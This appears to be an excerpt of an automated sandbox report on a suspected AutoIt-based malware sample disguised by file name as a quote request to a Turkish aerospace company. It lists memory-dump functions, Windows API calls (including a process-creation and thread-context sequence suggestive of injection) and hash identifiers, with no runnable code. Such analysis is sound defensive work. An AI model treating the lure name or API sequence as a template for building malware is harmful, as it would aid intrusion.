                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Init_thread_footer
                                                                                                                                    • String ID: CALL
                                                                                                                                    • API String ID: 1385522511-4196123274
                                                                                                                                    • Opcode ID: 7ec765f5abfe806eada540dc2097613ff030899b5296f64bd5b33ff5acf0b541
                                                                                                                                    • Instruction ID: 48c34e577d85b15a934cba61c9bdc859e8176082a6e046cc3d2cea9e2d03c867
                                                                                                                                    • Opcode Fuzzy Hash: 7ec765f5abfe806eada540dc2097613ff030899b5296f64bd5b33ff5acf0b541
                                                                                                                                    • Instruction Fuzzy Hash: 35229C70608302EFDB18DF14C484A2ABBF1BF9A354F15891DF4968B3A1D771E985CB92
                                                                                                                                    APIs
                                                                                                                                    • _wcslen.LIBCMT ref: 001F6F6B
                                                                                                                                      • Part of subcall function 00184ECB: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00251418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00184EFD
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: LibraryLoad_wcslen
                                                                                                                                    • String ID: >>>AUTOIT SCRIPT<<<
                                                                                                                                    • API String ID: 3312870042-2806939583
                                                                                                                                    • Opcode ID: 5f31f279eb7cfd25b6f851377cfc0aad011644d971825d9238c5f76d4719a2ac
                                                                                                                                    • Instruction ID: 4b824498c021aec97e7fd94954e21c7bcc475254dace1c25f757aef4f944ae0c
                                                                                                                                    • Opcode Fuzzy Hash: 5f31f279eb7cfd25b6f851377cfc0aad011644d971825d9238c5f76d4719a2ac
                                                                                                                                    • Instruction Fuzzy Hash: 35B17B311082058FDB14FF24D49197EB7E5AFA5304F14891DF596972A2EB30EE49CF92
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __fread_nolock
                                                                                                                                    • String ID: EA06
                                                                                                                                    • API String ID: 2638373210-3962188686
                                                                                                                                    • Opcode ID: 2a70b549952080cc169fcb9d02272a7ee336f4bfbd6c2429af1396c4eb744d7a
                                                                                                                                    • Instruction ID: 6fa59ff03694cf0773118b292c588af7869b42913ee0ef5eb34e6f0dfeccd1ff
                                                                                                                                    • Opcode Fuzzy Hash: 2a70b549952080cc169fcb9d02272a7ee336f4bfbd6c2429af1396c4eb744d7a
                                                                                                                                    • Instruction Fuzzy Hash: A801B5729042587EDF19C7A8C856EFEBBF8DB16305F00455AE152D2181E5B8E6188B60
                                                                                                                                    APIs
                                                                                                                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 018A02A5
                                                                                                                                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 018A02C9
                                                                                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 018A02EB
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1456313180.000000000189E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0189E000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_189e000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2438371351-0
                                                                                                                                    • Opcode ID: c7490eb0849e98549b11c4fe0459da6d53c4872c769bbd933b9fbf1e0076ab14
                                                                                                                                    • Instruction ID: b9c5541e3955cd0b7e27a5151e9de327c1a098d1494637f2e42922c620d89281
                                                                                                                                    • Opcode Fuzzy Hash: c7490eb0849e98549b11c4fe0459da6d53c4872c769bbd933b9fbf1e0076ab14
                                                                                                                                    • Instruction Fuzzy Hash: 5612CD24E24658C6EB24DF64D8507DEB232EF68300F1090E9910DEB7A5E77A4F91CF5A
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 544645111-0
                                                                                                                                    • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                    • Instruction ID: 599476efce21f3b7bb84fabd58d13365b2df59dfe36e8639d24e86f055e47f7b
                                                                                                                                    • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                    • Instruction Fuzzy Hash: 9131E275A00109EBCB18CF99D480969FBA6FF49310B25C6A9E809CF656D731EDC2DBC0
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00184E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00184EDD,?,00251418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00184E9C
                                                                                                                                      • Part of subcall function 00184E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00184EAE
                                                                                                                                      • Part of subcall function 00184E90: FreeLibrary.KERNEL32(00000000,?,?,00184EDD,?,00251418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00184EC0
                                                                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00251418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00184EFD
                                                                                                                                      • Part of subcall function 00184E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,001C3CDE,?,00251418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00184E62
                                                                                                                                      • Part of subcall function 00184E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00184E74
                                                                                                                                      • Part of subcall function 00184E59: FreeLibrary.KERNEL32(00000000,?,?,001C3CDE,?,00251418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00184E87
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Library$Load$AddressFreeProc
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2632591731-0
                                                                                                                                    • Opcode ID: 938e72ec4c135c282b47e7b108065d5bd37b4fa9b29b4f3142618a05f0a8ac27
                                                                                                                                    • Instruction ID: 9e4550dfb12180463ed835a597b1f6152df625e629d4671cae261f95c0958052
                                                                                                                                    • Opcode Fuzzy Hash: 938e72ec4c135c282b47e7b108065d5bd37b4fa9b29b4f3142618a05f0a8ac27
                                                                                                                                    • Instruction Fuzzy Hash: 8411E336610206ABDB14BF64DC06FAD77A5AF60714F20842EF642A61C1EF749B459F90
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __wsopen_s
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3347428461-0
                                                                                                                                    • Opcode ID: f460d2ef318a9d58d543c730763801fc6e037b515775359371c5a5d4216a4876
                                                                                                                                    • Instruction ID: 854ff2c4cfe976564017ec621e201de0045eef3eabf8d1667e036f5032524734
                                                                                                                                    • Opcode Fuzzy Hash: f460d2ef318a9d58d543c730763801fc6e037b515775359371c5a5d4216a4876
                                                                                                                                    • Instruction Fuzzy Hash: 3111187590420AAFCF05DF58E941ADA7BF9EF48314F114059FC08AB312DB31EA11CBA5
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 001B4C7D: RtlAllocateHeap.NTDLL(00000008,00181129,00000000,?,001B2E29,00000001,00000364,?,?,?,001AF2DE,001B3863,00251444,?,0019FDF5,?), ref: 001B4CBE
                                                                                                                                    • _free.LIBCMT ref: 001B506C
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AllocateHeap_free
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 614378929-0
                                                                                                                                    • Opcode ID: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                                                                                                                                    • Instruction ID: c5a519e1ae7e946769c3463ca52734648b216519c298bf1f258fb3afc8b01407
                                                                                                                                    • Opcode Fuzzy Hash: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                                                                                                                                    • Instruction Fuzzy Hash: D70126722047056BE3219F65D881A9AFBE9FB89370F25051DF19483280EB30A805C6B4
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                                                                                                    • Instruction ID: 1155eae1480f7695a6d7f163cac05be5413104070b0d228dfad4f4471dfd8d7f
                                                                                                                                    • Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                                                                                                    • Instruction Fuzzy Hash: FDF0F43A510A10A6D7353A799C05B9A33DC9F73334F100B19F429931D2DB70D8068AA5
                                                                                                                                    APIs
                                                                                                                                    • RtlAllocateHeap.NTDLL(00000008,00181129,00000000,?,001B2E29,00000001,00000364,?,?,?,001AF2DE,001B3863,00251444,?,0019FDF5,?), ref: 001B4CBE
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                    • Opcode ID: ee49c2215a7d596380eb65e061c537a811ebd4dbac9480f1bacede402bae9112
                                                                                                                                    • Instruction ID: 02034771ec996416f1cd5bb69a5eed4aad74c83dae5c3ddaca94f4d7c57b4bf5
                                                                                                                                    • Opcode Fuzzy Hash: ee49c2215a7d596380eb65e061c537a811ebd4dbac9480f1bacede402bae9112
                                                                                                                                    • Instruction Fuzzy Hash: 0AF0E93564222477DB215F669C09BEA3F88BF91FA1F15C125FC19E6183CB70DC0156E4
                                                                                                                                    APIs
                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,?,00251444,?,0019FDF5,?,?,0018A976,00000010,00251440,001813FC,?,001813C6,?,00181129), ref: 001B3852
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                    • Opcode ID: a392605c080d45aea25638d1b01dc474c9484f04b2974f72e5f4e4bb7e0b84d5
                                                                                                                                    • Instruction ID: 523d3d8a3572a0cadb4de91dd74fe692d3d6e7dc093df5315555d7f372f5dd8d
                                                                                                                                    • Opcode Fuzzy Hash: a392605c080d45aea25638d1b01dc474c9484f04b2974f72e5f4e4bb7e0b84d5
                                                                                                                                    • Instruction Fuzzy Hash: 70E0ED39140224ABE7212AAAAC04BDA3648AB927B0F160235FC24924D0DB60DE2182E2
                                                                                                                                    APIs
                                                                                                                                    • FreeLibrary.KERNEL32(?,?,00251418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00184F6D
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3664257935-0
                                                                                                                                    • Opcode ID: fbb2c7ac481d5a677550c080c32746c98907a63b3d20f55a13f559a0d031ac07
                                                                                                                                    • Instruction ID: 2b9c7659d9eb4d7c9a1e73fd87cc4c19991f66393faff41e7093aa230fcf558b
                                                                                                                                    • Opcode Fuzzy Hash: fbb2c7ac481d5a677550c080c32746c98907a63b3d20f55a13f559a0d031ac07
                                                                                                                                    • Instruction Fuzzy Hash: 7EF03975145752CFDB38AF68E494822BBE4BF143293258A7EF2EA82621CB319944DF50
                                                                                                                                    APIs
                                                                                                                                    • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00182DC4
                                                                                                                                      • Part of subcall function 00186B57: _wcslen.LIBCMT ref: 00186B6A
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: LongNamePath_wcslen
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 541455249-0
                                                                                                                                    • Opcode ID: e7c66a463ba96a0567aeb9fb0f89e697c6251c57f99ef26da90a0507f5b3730a
                                                                                                                                    • Instruction ID: 18bf87b719a264e2cd83b0ef2e1c82d8f97ba033358bd354f7cbe810b19f03ce
                                                                                                                                    • Opcode Fuzzy Hash: e7c66a463ba96a0567aeb9fb0f89e697c6251c57f99ef26da90a0507f5b3730a
                                                                                                                                    • Instruction Fuzzy Hash: B0E0CD766002245BC710A2589C09FDA77DDDFC8790F044075FD09D7248DA70ED848650
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __fread_nolock
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2638373210-0
                                                                                                                                    • Opcode ID: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                                                                                                                                    • Instruction ID: 1f2f720c9c037a077ecc3fff795144702d5a6c000578fa1cb798d21d7d53bc3d
                                                                                                                                    • Opcode Fuzzy Hash: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                                                                                                                                    • Instruction Fuzzy Hash: 9FE04FB0609B005FDF395A28A8517B677E89F4A310F00086EFA9BC3252E67268458A4D
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00183837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00183908
                                                                                                                                      • Part of subcall function 0018D730: GetInputState.USER32 ref: 0018D807
                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00182B6B
                                                                                                                                      • Part of subcall function 001830F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 0018314E
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: IconNotifyShell_$CurrentDirectoryInputState
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3667716007-0
                                                                                                                                    • Opcode ID: 7c431a56631cefd49ab6352053e9043098584b2882748f128d4db71384ccabaf
                                                                                                                                    • Instruction ID: e921899a63f699b878df7fc69ab719637a6779b9d8da377bce066c0a11d18518
                                                                                                                                    • Opcode Fuzzy Hash: 7c431a56631cefd49ab6352053e9043098584b2882748f128d4db71384ccabaf
                                                                                                                                    • Instruction Fuzzy Hash: 04E0862130424406CA04BB74B8565BDB7599BF2756F44163EF552471A2CF344B594B52
                                                                                                                                    APIs
                                                                                                                                    • CreateFileW.KERNELBASE(00000000,00000000,?,001C0704,?,?,00000000,?,001C0704,00000000,0000000C), ref: 001C03B7
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateFile
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                    • Opcode ID: e588dd59fad59fa8b316e7b193c7488d3e600735c551f04c31719e1be2de5c37
                                                                                                                                    • Instruction ID: 8091a098a3573b948bb7fcbf8bc1c02ec2a9e6e5adb57a018e16f479a9c1067f
                                                                                                                                    • Opcode Fuzzy Hash: e588dd59fad59fa8b316e7b193c7488d3e600735c551f04c31719e1be2de5c37
